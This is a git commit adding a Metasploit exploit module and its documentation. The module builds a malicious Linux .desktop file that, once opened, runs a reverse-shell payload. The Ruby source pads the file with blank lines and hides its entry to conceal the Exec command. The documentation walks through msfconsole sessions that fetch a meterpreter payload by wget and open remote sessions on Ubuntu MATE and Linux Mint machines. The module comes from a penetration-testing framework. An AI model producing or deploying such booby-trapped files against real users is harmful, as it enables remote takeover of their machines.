Add Malicious XDG Desktop File module

bcoles · bcoles · commit a7ab23d0839e · 2025-08-04T19:23:02.000+10:00
diff --git a/documentation/modules/exploit/multi/fileformat/xdg_desktop.md b/documentation/modules/exploit/multi/fileformat/xdg_desktop.md
@@ -0,0 +1,122 @@
+## Vulnerable Application
+
+This module creates a malicious XDG Desktop (.desktop) file.
+
+On most modern systems, desktop files are not trusted by default.
+The user will receive a warning prompt that the file is not trusted
+when running the file, but may choose to run the file anyway.
+
+The default file manager applications in some desktop environments
+may impose more strict execution requirements by prompting the user
+to set the file as executable and/or marking the file as trusted
+before the file can be executed.
+
+
+## Options
+
+### FILENAME
+
+The desktop file name. (Default: `msf.desktop`)
+
+### APPLICATION_NAME
+
+The application name. Some file managers will display this name instead of the file name. (Default: random)
+
+
+## Advanced Options
+
+### PrependNewLines
+
+Prepend new lines before the payload. (Default: `100`)
+
+
+## Verification Steps
+
+On the Metasploit host:
+
+1. Start msfconsole
+1. Do: `use exploit/multi/fileformat/xdg_desktop`
+1. Do: `set filename [filename.desktop]`
+1. Do: `set payload [payload]`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `run`
+1. Do: `handler -p [payload] -P [lport] -H [lhost]`
+
+On the target machine:
+
+1. Open the `msf.desktop` file
+1. If prompted, choose "Launch Anyway"
+
+
+## Scenarios
+
+### Ubuntu MATE 24.04.2 (x86_64)
+
+```
+msf > use exploit/multi/fileformat/xdg_desktop
+[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
+msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
+lport => 4444
+msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
+FETCH_COMMAND => WGET
+msf exploit(multi/fileformat/xdg_desktop) > run
+[+] msf.desktop stored at /root/.msf4/local/msf.desktop
+msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
+[*] Payload handler running as background job 0.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+msf exploit(multi/fileformat/xdg_desktop) > 
+[*] Sending stage (3090404 bytes) to 192.168.200.193
+[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.193:52462) at 2025-07-29 03:29:10 -0400
+
+msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer     : linuxmint-mate-24-04.2-desktop-amd64
+OS           : Ubuntu 24.04 (Linux 6.14.0-24-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### Linux Mint 22.1 (MATE) (x86_64)
+
+```
+msf > use exploit/multi/fileformat/xdg_desktop 
+[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
+msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp 
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
+lport => 4444
+msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
+FETCH_COMMAND => WGET
+msf exploit(multi/fileformat/xdg_desktop) > run
+[+] msf.desktop stored at /root/.msf4/local/msf.desktop
+msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
+[*] Payload handler running as background job 0.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+msf exploit(multi/fileformat/xdg_desktop) > 
+[*] Sending stage (3090404 bytes) to 192.168.200.189
+[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.189:35162) at 2025-07-29 02:45:34 -0400
+
+msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo 
+Computer     : 192.168.200.189
+OS           : LinuxMint 22.1 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
diff --git a/modules/exploits/multi/fileformat/xdg_desktop.rb b/modules/exploits/multi/fileformat/xdg_desktop.rb
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Malicious XDG Desktop File',
+        'Description' => %q{
+          This module creates a malicious XDG Desktop (.desktop) file.
+
+          On most modern systems, desktop files are not trusted by default.
+          The user will receive a warning prompt that the file is not trusted
+          when running the file, but may choose to run the file anyway.
+
+          The default file manager applications in some desktop environments
+          may impose more strict execution requirements by prompting the user
+          to set the file as executable and/or marking the file as trusted
+          before the file can be executed.
+        },
+        'Author' => [
+          'bcoles'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
+          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/'],
+          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/exec-variables.html'],
+          ['URL', 'https://wiki.archlinux.org/title/Desktop_entries']
+        ],
+        'Platform' => %w[linux unix solaris freebsd],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [ 'Automatic', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2007-02-06',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [SCREEN_EFFECTS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('FILENAME', [true, 'The desktop file name.', 'msf.desktop']),
+      OptString.new('APPLICATION_NAME', [false, 'The application name. Some file managers will display this name instead of the file name. (default is random)', '']),
+    ])
+
+    register_advanced_options([
+      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the payload.', 100]),
+    ])
+  end
+
+  def application_name
+    datastore['APPLICATION_NAME'].blank? ? rand_text_alpha(6..12) : datastore['APPLICATION_NAME']
+  end
+
+  def exploit
+    values = [
+      'Type=Application',
+      "Name=#{application_name}",
+      # 'Hidden=true', # This property is not supported by old systems, which prevents execution
+      'NoDisplay=true',
+      'Terminal=false'
+    ]
+    desktop = "[Desktop Entry]\n"
+    desktop << values.shuffle.join("\n")
+    desktop << "\n"
+    desktop << "\n" * datastore['PrependNewLines']
+
+    escaped_payload = payload.encoded.gsub('\\', '\\\\\\').gsub('"', '\\"')
+    desktop << "Exec=/bin/sh -c \"#{escaped_payload}\""
+
+    file_create(desktop)
+  end
+end
